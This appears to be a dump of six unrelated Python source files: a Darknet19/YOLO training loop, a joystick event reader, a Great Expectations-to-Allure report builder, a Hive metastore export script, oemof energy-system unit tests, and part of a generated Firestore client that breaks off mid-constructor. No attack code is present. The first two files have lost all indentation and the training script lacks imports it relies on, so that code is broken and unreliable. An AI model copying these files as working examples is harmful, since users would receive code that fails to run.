from darknet import Darknet19
from datasets.pascal_voc import VOCDataset
import utils.yolo as yolo_utils
import utils.network as net_utils
from utils.timer import Timer
import cfgs.config as cfg
from random import randint
try:
from pycrayon import CrayonClient
except ImportError:
CrayonClient = None
# data loader
imdb = VOCDataset(cfg.imdb_train, cfg.DATA_DIR, cfg.train_batch_size,
yolo_utils.preprocess_train, processes=2, shuffle=True,
dst_size=cfg.multi_scale_inp_size)
# dst_size=cfg.inp_size)
print('load data succ...')
net = Darknet19()
# net_utils.load_net(cfg.trained_model, net)
# pretrained_model = os.path.join(cfg.train_output_dir,
# 'darknet19_voc07trainval_exp1_63.h5')
# pretrained_model = cfg.trained_model
# net_utils.load_net(pretrained_model, net)
net.load_from_npz(cfg.pretrained_model, num_conv=18)
net.cuda()
net.train()
print('load net succ...')
# optimizer
start_epoch = 0
lr = cfg.init_learning_rate
optimizer = torch.optim.SGD(net.parameters(), lr=lr, momentum=cfg.momentum,
weight_decay=cfg.weight_decay)
# tensorboad
use_tensorboard = cfg.use_tensorboard and CrayonClient is not None
# use_tensorboard = False
remove_all_log = False
if use_tensorboard:
cc = CrayonClient(hostname='127.0.0.1')
if remove_all_log:
print('remove all experiments')
cc.remove_all_experiments()
if start_epoch == 0:
try:
cc.remove_experiment(cfg.exp_name)
except ValueError:
pass
exp = cc.create_experiment(cfg.exp_name)
else:
exp = cc.open_experiment(cfg.exp_name)
batch_per_epoch = imdb.batch_per_epoch
train_loss = 0
bbox_loss, iou_loss, cls_loss = 0., 0., 0.
cnt = 0
t = Timer()
step_cnt = 0
size_index = 0
for step in range(start_epoch * imdb.batch_per_epoch,
cfg.max_epoch * imdb.batch_per_epoch):
t.tic()
# batch
batch = imdb.next_batch(size_index)
im = batch['images']
gt_boxes = batch['gt_boxes']
gt_classes = batch['gt_classes']
dontcare = batch['dontcare']
    origin_im = batch['origin_im']
# forward
im_data = net_utils.np_to_variable(im,
is_cuda=True,
volatile=False).permute(0, 3, 1, 2)
net(im_data, gt_boxes, gt_classes, dontcare, size_index)
# backward
loss = net.loss
bbox_loss += net.bbox_loss.data.cpu().numpy()[0]
iou_loss += net.iou_loss.data.cpu().numpy()[0]
cls_loss += net.cls_loss.data.cpu().numpy()[0]
train_loss += loss.data.cpu().numpy()[0]
optimizer.zero_grad()
loss.backward()
optimizer.step()
cnt += 1
step_cnt += 1
duration = t.toc()
if step % cfg.disp_interval == 0:
train_loss /= cnt
bbox_loss /= cnt
iou_loss /= cnt
cls_loss /= cnt
print(('epoch %d[%d/%d], loss: %.3f, bbox_loss: %.3f, iou_loss: %.3f, '
'cls_loss: %.3f (%.2f s/batch, rest:%s)' %
(imdb.epoch, step_cnt, batch_per_epoch, train_loss, bbox_loss,
iou_loss, cls_loss, duration,
str(datetime.timedelta(seconds=int((batch_per_epoch - step_cnt) * duration)))))) # noqa
if use_tensorboard and step % cfg.log_interval == 0:
exp.add_scalar_value('loss_train', train_loss, step=step)
exp.add_scalar_value('loss_bbox', bbox_loss, step=step)
exp.add_scalar_value('loss_iou', iou_loss, step=step)
exp.add_scalar_value('loss_cls', cls_loss, step=step)
exp.add_scalar_value('learning_rate', lr, step=step)
train_loss = 0
bbox_loss, iou_loss, cls_loss = 0., 0., 0.
cnt = 0
t.clear()
size_index = randint(0, len(cfg.multi_scale_inp_size) - 1)
print("image_size {}".format(cfg.multi_scale_inp_size[size_index]))
if step > 0 and (step % imdb.batch_per_epoch == 0):
if imdb.epoch in cfg.lr_decay_epochs:
lr *= cfg.lr_decay
optimizer = torch.optim.SGD(net.parameters(), lr=lr,
momentum=cfg.momentum,
weight_decay=cfg.weight_decay)
save_name = os.path.join(cfg.train_output_dir,
'{}_{}.h5'.format(cfg.exp_name, imdb.epoch))
net_utils.save_net(save_name, net)
print(('save model: {}'.format(save_name)))
step_cnt = 0
imdb.close()
|
the-stack_0_25973
|
#!/usr/bin/python
import sys
import select
JS_EVENT_BUTTON = 0x01
JS_EVENT_AXIS = 0x02
JS_EVENT_INIT = 0x08
axes = []
buttons = []
def init():
global axes, buttons
packet = sys.stdin.readline().split()
axes = [0.] * int(packet[0])
buttons = [False] * int(packet[1])
def get():  # ignores JS_EVENT_INIT
global axes, buttons
modificados = [[], []]
while select.select([sys.stdin], [], [], 0.)[0]:
packet = sys.stdin.readline().split()
packet[0], packet[1] = int(packet[0]), int(packet[1])
if bool(packet[0] & JS_EVENT_BUTTON):
buttons[packet[1]] = True if packet[2] == '1' else False
modificados[1].append(packet[1])
else:
axes[packet[1]] = float(packet[2])
modificados[0].append(packet[1])
return modificados
if __name__ == "__main__":
init()
while True:
if select.select([sys.stdin], [], [], 0.)[0]:
print(get())
print(axes, buttons)
|
the-stack_0_25977
|
import json
import os
import sys
from datetime import datetime
import glob
import great_expectations as ge
from great_expectations.expectations.expectation import (
ExpectationConfiguration,
)
from great_expectations.expectations.registry import (
get_expectation_impl)
import shutil
def initialize_config():
with open("config.json", "r") as jsonfile:
data = json.load(jsonfile)
root_ge_dir = data['root_folder_ge']
allure_result_dir = data['allure_result']
allure_report_dir = data['allure_report']
    # use the suite name passed on the command line if present, otherwise the default
    if len(sys.argv) < 2:
        test_suite = data['default_suite']
    else:
        test_suite = sys.argv[1]
return root_ge_dir, allure_result_dir, allure_report_dir, test_suite
def get_test_human_name(file):
exp = get_expectation_impl(get_test_name(file))
template_json = exp._prescriptive_renderer(
configuration=ExpectationConfiguration(get_test_name(file),
kwargs=get_params1(file)))[0]
if type(template_json) is not dict:
template_json = template_json.to_json_dict()
template_str = template_json['string_template']['template']
params = get_params1(file)
result_string = template_str
new_params = {}
for key, value in params.items():
if type(value) == list:
if key == 'value_set':
for i in value:
new_params["v__" + str(value.index(i))] = i
else:
for i in value:
new_params[str(key) + "_" + str(value.index(i))] = i
if new_params:
if 'value_set' in params.keys():
del params['value_set']
params.update(new_params)
else:
params = new_params
for key, value in params.items():
result_string = result_string.replace('$%s' % key, str(value))
return result_string
def get_json(ge_root_dir, test_suite):
file = glob.glob(
os.path.join(os.path.abspath(ge_root_dir),
'great_expectations/uncommitted/validations/' + test_suite
+ '/**/**/*.json'), recursive=False)
with open(file[0]) as jsonfile:
return json.load(jsonfile)
def get_test_name(file):
return file['expectation_config']['expectation_type']
def get_suit_name(file, i):
return file['meta']['active_batch_definition']['data_asset_name'] + "." + i['expectation_config']['kwargs'][
'column'] if 'column' in i['expectation_config']['kwargs'] else file['meta']['active_batch_definition']['data_asset_name']
def get_jira_ticket(file):
if 'Bug Ticket' in file['expectation_config']['meta']:
return {
"name": "Bug ticket",
"url": file['expectation_config']['meta']['Bug Ticket'],
"type": "issue"
}
else:
return {}
def get_severity(file):
return file['expectation_config']['meta']['Severity'] if 'Severity' in file['expectation_config']['meta'] else ""
def get_start_suit_time(file):
return parse_datetime(file['meta']['batch_markers']['ge_load_time'])
def get_stop_suit_time():
return datetime.now().timestamp()
def parse_datetime(date_str):
return datetime.timestamp(datetime.strptime(date_str, '%Y%m%dT%H%M%S.%fZ'))*1000
def parse_datetime_run_name(date_str):
date_str = date_str.replace("+00:00","Z")
return datetime.timestamp(datetime.strptime(date_str, '%Y-%m-%dT%H:%M:%S.%fZ'))*1000
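# Illustrative inputs for the two parsers above (both interpret the string with a
# naive strptime, so the resulting millisecond timestamps follow the local timezone):
#   parse_datetime("20210101T120000.000000Z")
#   parse_datetime_run_name("2021-01-01T12:00:00.000000+00:00")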
def get_start_test_time(file):
return parse_datetime_run_name(file['meta']['run_id']['run_time'])
def get_stop_test_time(file):
return parse_datetime(file['meta']['validation_time'])
def get_params(file):
params = file['expectation_config']['kwargs']
result = []
    for param in params:
        if isinstance(params[param], list):
            result.append({"name": param, "value": str(params[param])})
        else:
            result.append({"name": param, "value": params[param]})
return result
def get_params1(file):
params = file['expectation_config']['kwargs']
return params
def get_test_status(file):
return "passed" if file['success'] is True else "failed"
def get_test_description(file):
    result = ""
    for f in file['result']:
        # Collect every result field except the observed value itself.
        if str(f) != 'observed_value':
            result += str(f) + ": " + str(file['result'][f]) + "\n"
    return result
def get_observed_value(file):
return "Observed value: " + str(file['result']['observed_value']) if 'observed_value' in file[
        'result'] else "Unexpected count: " + str(file['result']['unexpected_count'])
def get_exception_message(file):
return file['exception_info']['exception_message']
def get_exception_traceback(file):
return file['exception_info']['exception_traceback']
def create_categories_json(allure_result):
data = [
{
"name": "Ignored tests",
"matchedStatuses": [
"skipped"
]
},
{
"name": "Passed tests",
"matchedStatuses": [
"passed"
]
},
{
"name": "Broken tests",
"matchedStatuses": [
"broken"
]
},
{
"name": "Failed tests",
"matchedStatuses": [
"failed"
]
}
]
result = json.dumps(data)
with open(allure_result + "/categories.json", "w") as file:
file.write(result)
def get_uuid(i, allure_report):
fl = ""
if os.path.exists(allure_report + '/history'):
with open(allure_report + '/history/history.json') as jsonfile:
fl = json.load(jsonfile)
keys = list(fl.keys())
keys.sort()
return keys[i]
else:
return datetime.now().strftime("%S%f")
def create_suit_json(allure_result, allure_report, ge_root_dir, test_suite):
if os.path.exists(allure_result):
shutil.rmtree(allure_result + '/')
os.makedirs(allure_result)
file = get_json(ge_root_dir, test_suite)
start_time = get_start_suit_time(file)
stop_time = get_stop_test_time(file)
for i in file['results']:
uuid = str(get_uuid(list(file['results']).index(i), allure_report))
data = {
"uuid": uuid,
"historyId": uuid,
"status": get_test_status(i),
"parameters": get_params(i),
"labels": [{
"name": "test",
"value": get_test_name(i)
}, {
"name": "suite",
"value": get_suit_name(file, i)
},
{
"name": "severity",
"value": get_severity(i)
}
],
"links": [get_jira_ticket(i)],
"name": get_test_name(i),
"description": get_test_description(i),
"statusDetails": {"known": False, "muted": False, "flaky": False,
"message": get_observed_value(i) if get_test_status(i) == 'failed' else "",
"trace": get_exception_traceback(i)},
"start": start_time,
"stop": stop_time,
"steps": [
{
"status": get_test_status(i),
"name": get_test_human_name(i),
"start": get_start_test_time(file),
"stop": get_stop_test_time(file)
}]
}
result = json.dumps(data)
with open(allure_result + '/' + uuid + "-result.json", "w") as fl:
fl.write(result)
def transfer_folder(root_src_dir, root_dst_dir):
for src_dir, dirs, files in os.walk(root_src_dir):
dst_dir = src_dir.replace(root_src_dir, root_dst_dir, 1)
if not os.path.exists(dst_dir):
os.makedirs(dst_dir)
for file_ in files:
src_file = os.path.join(src_dir, file_)
dst_file = os.path.join(dst_dir, file_)
if os.path.exists(dst_file):
# in case of the src and dst are the same file
if os.path.samefile(src_file, dst_file):
continue
os.remove(dst_file)
shutil.copy(src_file, dst_dir)
def transfer_history(allure_result, allure_report):
if os.path.isdir(allure_report):
transfer_folder(allure_report + '/history', allure_result + '/history')
def create_json_report(root_ge_dir="", allure_result_dir="", allure_report_dir="", test_suite=""):
root_ge_dir_config, allure_result_dir_config, allure_report_dir_config, test_suite_config = initialize_config()
root_ge_dir = root_ge_dir_config if len(root_ge_dir) == 0 else root_ge_dir
allure_result_dir = allure_result_dir_config if len(allure_result_dir) == 0 else allure_result_dir
allure_report_dir = allure_report_dir_config if len(allure_report_dir) == 0 else allure_report_dir
test_suite = test_suite_config if len(test_suite) == 0 else test_suite
create_suit_json(allure_result_dir, allure_report_dir, root_ge_dir, test_suite)
create_categories_json(allure_result_dir)
transfer_history(allure_result_dir, allure_report_dir)
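# Example of calling the report builder directly with explicit locations instead of
# relying on config.json (the paths and suite name below are placeholders only):
#   create_json_report(root_ge_dir="/path/to/project",
#                      allure_result_dir="allure-results",
#                      allure_report_dir="allure-report",
#                      test_suite="my_suite")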
if __name__ == '__main__':
create_json_report()
|
the-stack_0_25978
|
#!/usr/bin/python
#
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import sys
import pandas as pd
from pyhive import hive
def __get_hive_conn(host, username, port=10000, schema='default'):
return hive.connect(host=host,
port=port,
username=username,
database=schema,
auth=None)
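# The defaults above assume an unauthenticated HiveServer2 listening on
# localhost:10000 with the 'default' schema; for a different setup a call such as
# the following would be used (host and username here are placeholders):
#   con = __get_hive_conn('metastore.example.com', 'analyst', port=10000, schema='default')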
def __extract(csv_file_name):
con = __get_hive_conn('localhost', 'hive')
cur = con.cursor()
query = """ SELECT
d."DB_ID" DATABASE_ID, d."NAME" DATABASE_NAME, d."DESC" DATABASE_DESC,
d."DB_LOCATION_URI" DATABASE_URI,
t."TBL_ID" TABLE_ID, t."TBL_NAME" TABLE_NAME, t."TBL_TYPE" TABLE_TYPE,
t."CREATE_TIME" TABLE_CREATE_TIME, t."LAST_ACCESS_TIME" TABLE_LAST_ACCESS_TIME,
s."LOCATION" TABLE_URI,
c."COLUMN_NAME" COLUMN_NAME, c."TYPE_NAME" COLUMN_TYPE, c."COMMENT" COLUMN_DESC,
c."INTEGER_IDX" COLUMN_INDEX
FROM "DBS" d
LEFT JOIN "TBLS" t on t."DB_ID" = d."DB_ID"
LEFT JOIN "SDS" s on s."SD_ID" = t."SD_ID"
LEFT JOIN "COLUMNS_V2" c on s."CD_ID" = c."CD_ID";
"""
# Execute query
cur.execute(query)
# Put it all to a data frame
sql_data = pd.DataFrame(cur.fetchall())
sql_data.columns = [item[0] for item in cur.description]
# Close the session
con.close()
# Show the data
logging.info(sql_data.head())
sql_data.to_csv(csv_file_name, sep=',', encoding='utf-8')
if __name__ == '__main__':
# Enable logging
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
__extract('hive_full_dump.csv')
|
the-stack_0_25979
|
# -*- coding: utf-8 -
"""Basic tests.
This file is part of project oemof (github.com/oemof/oemof). It's copyrighted
by the contributors recorded in the version control history of the file,
available from its original location oemof/tests/basic_tests.py
SPDX-License-Identifier: MIT
"""
try:
from collections.abc import Iterable
except ImportError:
from collections import Iterable
from pprint import pformat
from nose.tools import ok_, eq_
import pandas as pd
from oemof import energy_system as es
from oemof.network import Entity
from oemof.network import Bus, Transformer
from oemof.network import Bus as NewBus, Node, temporarily_modifies_registry
from oemof.groupings import Grouping, Nodes, Flows, FlowsWithNodes as FWNs
class TestsEnergySystem:
@classmethod
def setUpClass(cls):
cls.timeindex = pd.date_range('1/1/2012', periods=5, freq='H')
def setup(self):
self.es = es.EnergySystem()
Node.registry = self.es
def test_entity_registration(self):
bus = Bus(label='bus-uid', type='bus-type')
eq_(self.es.nodes[0], bus)
bus2 = Bus(label='bus-uid2', type='bus-type')
eq_(self.es.nodes[1], bus2)
t1 = Transformer(label='pp_gas', inputs=[bus], outputs=[bus2])
ok_(t1 in self.es.nodes)
self.es.timeindex = self.timeindex
ok_(len(self.es.timeindex) == 5)
def test_entity_grouping_on_construction(self):
bus = Bus(label="test bus")
ensys = es.EnergySystem(entities=[bus])
ok_(ensys.groups[bus.label] is bus)
def test_that_nodes_is_a_proper_alias_for_entities(self):
b1, b2 = Bus(label="B1"), Bus(label="B2")
eq_(self.es.nodes, [b1, b2])
empty = []
self.es.nodes = empty
ok_(self.es.entities is empty)
def test_that_none_is_not_a_valid_group(self):
def by_uid(n):
if "Not in 'Group'" in n.uid:
return None
else:
return "Group"
ensys = es.EnergySystem(groupings=[by_uid])
ungrouped = [Entity(uid="Not in 'Group': {}".format(i))
for i in range(10)]
grouped = [Entity(uid="In 'Group': {}".format(i))
for i in range(10)]
ok_(None not in ensys.groups)
for g in ensys.groups.values():
for e in ungrouped:
if isinstance(g, Iterable) and not isinstance(g, str):
ok_(e not in g)
for e in grouped:
if isinstance(g, Iterable) and not isinstance(g, str):
ok_(e in g)
@temporarily_modifies_registry
def test_defining_multiple_groupings_with_one_function(self):
def assign_to_multiple_groups_in_one_go(n):
g1 = n.label[-1]
g2 = n.label[0:3]
return [g1, g2]
ensy = es.EnergySystem(groupings=[assign_to_multiple_groups_in_one_go])
Node.registry = ensy
[Node(label=("Foo: " if i % 2 == 0 else "Bar: ") +
"{}".format(i) + ("A" if i < 5 else "B")) for i in
range(10)]
for group in ["Foo", "Bar", "A", "B"]:
eq_(len(ensy.groups[group]), 5,
("\n Failed testing length of group '{}'." +
"\n Expected: 5" +
"\n Got : {}" +
"\n Group : {}").format(
group, len(ensy.groups[group]),
sorted([e.label for e in ensy.groups[group]])))
def test_grouping_filter_parameter(self):
g1 = Grouping(key=lambda e: "The Special One",
filter=lambda e: "special" in str(e))
g2 = Nodes(key=lambda e: "A Subset",
filter=lambda e: "subset" in str(e))
ensys = es.EnergySystem(groupings=[g1, g2])
special = Node(label="special")
subset = set(Node(label="subset: {}".format(i)) for i in range(10))
others = set(Node(label="other: {}".format(i)) for i in range(10))
ensys.add(special, *subset)
ensys.add(*others)
eq_(ensys.groups["The Special One"], special)
eq_(ensys.groups["A Subset"], subset)
def test_proper_filtering(self):
""" `Grouping.filter` should not be "all or nothing".
There was a bug where, if `Grouping.filter` returned `False` only for
some elements of `Grouping.value(e)`, those elements where actually
retained.
This test makes sure that the bug doesn't resurface again.
"""
g = Nodes(key="group", value=lambda _: {1, 2, 3, 4},
filter=lambda x: x % 2 == 0)
ensys = es.EnergySystem(groupings=[g])
special = Node(label="object")
ensys.add(special)
eq_(ensys.groups["group"], {2, 4})
def test_non_callable_group_keys(self):
collect_everything = Nodes(key="everything")
g1 = Grouping(key="The Special One",
filter=lambda e: "special" in e.label)
g2 = Nodes(key="A Subset", filter=lambda e: "subset" in e.label)
ensys = es.EnergySystem(groupings=[g1, g2, collect_everything])
special = Node(label="special")
subset = set(Node(label="subset: {}".format(i)) for i in range(2))
others = set(Node(label="other: {}".format(i)) for i in range(2))
everything = subset.union(others)
everything.add(special)
ensys.add(*everything)
eq_(ensys.groups["The Special One"], special)
eq_(ensys.groups["A Subset"], subset)
eq_(ensys.groups["everything"], everything)
def test_grouping_laziness(self):
""" Energy system `groups` should be fully lazy.
`Node`s added to an energy system should only be tested for and put
into their respective groups right before the `groups` property of an
energy system is accessed.
"""
group = "Group"
g = Nodes(key=group, filter=lambda n: getattr(n, "group", False))
self.es = es.EnergySystem(groupings=[g])
buses = [Bus("Grouped"), Bus("Ungrouped one"), Bus("Ungrouped two")]
self.es.add(buses[0])
buses[0].group = True
self.es.add(*buses[1:])
ok_(
group in self.es.groups,
"\nExpected to find\n\n `{!r}`\n\nin `es.groups`.\nGot:\n\n `{}`"
.format(
group,
"\n ".join(pformat(set(self.es.groups.keys())).split("\n")),
),
)
ok_(
buses[0] in self.es.groups[group],
"\nExpected\n\n `{}`\n\nin `es.groups['{}']`:\n\n `{}`"
.format(
"\n ".join(pformat(buses[0]).split("\n")),
group,
"\n ".join(pformat(self.es.groups[group]).split("\n"))
),
)
@temporarily_modifies_registry
def test_constant_group_keys(self):
""" Callable keys passed in as `constant_key` should not be called.
The `constant_key` parameter can be used to specify callable group keys
without having to worry about `Grouping`s trying to call them. This
test makes sure that the parameter is handled correctly.
"""
everything = lambda: "everything"
collect_everything = Nodes(constant_key=everything)
ensys = es.EnergySystem(groupings=[collect_everything])
Node.registry = ensys
node = Node(label="A Node")
ok_("everything" not in ensys.groups)
ok_(everything in ensys.groups)
eq_(ensys.groups[everything], {node})
@temporarily_modifies_registry
def test_flows(self):
key = object()
ensys = es.EnergySystem(groupings=[Flows(key)])
Node.registry = ensys
flows = (object(), object())
bus = NewBus(label="A Bus")
Node(label="A Node", inputs={bus: flows[0]}, outputs={bus: flows[1]})
eq_(ensys.groups[key], set(flows))
@temporarily_modifies_registry
def test_flows_with_nodes(self):
key = object()
ensys = es.EnergySystem(groupings=[FWNs(key)])
Node.registry = ensys
flows = (object(), object())
bus = NewBus(label="A Bus")
node = Node(label="A Node",
inputs={bus: flows[0]}, outputs={bus: flows[1]})
eq_(ensys.groups[key], {(bus, node, flows[0]), (node, bus, flows[1])})
def test_that_node_additions_are_signalled(self):
"""
When a node gets `add`ed, a corresponding signal should be emitted.
"""
node = Node(label="Node")
def subscriber(sender, **kwargs):
ok_(sender is node)
ok_(kwargs['EnergySystem'] is self.es)
subscriber.called = True
subscriber.called = False
es.EnergySystem.signals[es.EnergySystem.add].connect(
subscriber, sender=node
)
self.es.add(node)
ok_(
subscriber.called,
(
"\nExpected `subscriber.called` to be `True`.\n"
"Got {}.\n"
"Probable reason: `subscriber` didn't get called."
).format(subscriber.called),
)
|
the-stack_0_25980
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
from distutils import util
import os
import re
from typing import (
Callable,
Dict,
Optional,
Iterable,
Iterator,
Sequence,
Tuple,
Type,
Union,
)
import pkg_resources
from google.api_core import client_options as client_options_lib # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.firestore_v1.services.firestore import pagers
from google.cloud.firestore_v1.types import common
from google.cloud.firestore_v1.types import document
from google.cloud.firestore_v1.types import document as gf_document
from google.cloud.firestore_v1.types import firestore
from google.cloud.firestore_v1.types import query
from google.cloud.firestore_v1.types import write as gf_write
from google.protobuf import timestamp_pb2 # type: ignore
from google.rpc import status_pb2 # type: ignore
from .transports.base import FirestoreTransport, DEFAULT_CLIENT_INFO
from .transports.grpc import FirestoreGrpcTransport
from .transports.grpc_asyncio import FirestoreGrpcAsyncIOTransport
class FirestoreClientMeta(type):
"""Metaclass for the Firestore client.
This provides class-level methods for building and retrieving
support objects (e.g. transport) without polluting the client instance
objects.
"""
_transport_registry = OrderedDict() # type: Dict[str, Type[FirestoreTransport]]
_transport_registry["grpc"] = FirestoreGrpcTransport
_transport_registry["grpc_asyncio"] = FirestoreGrpcAsyncIOTransport
def get_transport_class(cls, label: str = None,) -> Type[FirestoreTransport]:
"""Returns an appropriate transport class.
Args:
label: The name of the desired transport. If none is
provided, then the first transport in the registry is used.
Returns:
The transport class to use.
"""
# If a specific transport is requested, return that one.
if label:
return cls._transport_registry[label]
# No transport is requested; return the default (that is, the first one
# in the dictionary).
return next(iter(cls._transport_registry.values()))
class FirestoreClient(metaclass=FirestoreClientMeta):
"""The Cloud Firestore service.
Cloud Firestore is a fast, fully managed, serverless, cloud-
native NoSQL document database that simplifies storing, syncing,
and querying data for your mobile, web, and IoT apps at global
scale. Its client libraries provide live synchronization and
offline support, while its security features and integrations
with Firebase and Google Cloud Platform (GCP) accelerate
building truly serverless apps.
"""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Converts api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
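    # Illustrative conversions performed by _get_default_mtls_endpoint (derived from
    # the regex above; the endpoint strings are examples, not live configuration):
    #   "firestore.googleapis.com"         -> "firestore.mtls.googleapis.com"
    #   "firestore.sandbox.googleapis.com" -> "firestore.mtls.sandbox.googleapis.com"
    #   "firestore.mtls.googleapis.com"    -> unchanged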
DEFAULT_ENDPOINT = "firestore.googleapis.com"
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
FirestoreClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(info)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
FirestoreClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@property
def transport(self) -> FirestoreTransport:
"""Returns the transport used by the client instance.
Returns:
FirestoreTransport: The transport used by the client
instance.
"""
return self._transport
@staticmethod
def common_billing_account_path(billing_account: str,) -> str:
"""Returns a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str, str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(folder: str,) -> str:
"""Returns a fully-qualified folder string."""
return "folders/{folder}".format(folder=folder,)
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str, str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(organization: str,) -> str:
"""Returns a fully-qualified organization string."""
return "organizations/{organization}".format(organization=organization,)
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str, str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(project: str,) -> str:
"""Returns a fully-qualified project string."""
return "projects/{project}".format(project=project,)
@staticmethod
def parse_common_project_path(path: str) -> Dict[str, str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(project: str, location: str,) -> str:
"""Returns a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(
project=project, location=location,
)
@staticmethod
def parse_common_location_path(path: str) -> Dict[str, str]:
"""Parse a location path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path)
return m.groupdict() if m else {}
def __init__(
self,
*,
credentials: Optional[ga_credentials.Credentials] = None,
transport: Union[str, FirestoreTransport, None] = None,
client_options: Optional[client_options_lib.ClientOptions] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the firestore client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, FirestoreTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. It won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
if isinstance(client_options, dict):
client_options = client_options_lib.from_dict(client_options)
if client_options is None:
client_options = client_options_lib.ClientOptions()
# Create SSL credentials for mutual TLS if needed.
use_client_cert = bool(
util.strtobool(os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false"))
)
client_cert_source_func = None
is_mtls = False
if use_client_cert:
if client_options.client_cert_source:
is_mtls = True
client_cert_source_func = client_options.client_cert_source
else:
is_mtls = mtls.has_default_client_cert_source()
if is_mtls:
client_cert_source_func = mtls.default_client_cert_source()
else:
client_cert_source_func = None
# Figure out which api endpoint to use.
if client_options.api_endpoint is not None:
api_endpoint = client_options.api_endpoint
else:
use_mtls_env = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
if use_mtls_env == "never":
api_endpoint = self.DEFAULT_ENDPOINT
elif use_mtls_env == "always":
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
elif use_mtls_env == "auto":
if is_mtls:
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
else:
api_endpoint = self.DEFAULT_ENDPOINT
else:
raise MutualTLSChannelError(
"Unsupported GOOGLE_API_USE_MTLS_ENDPOINT value. Accepted "
"values: never, auto, always"
)
# Save or instantiate the transport.
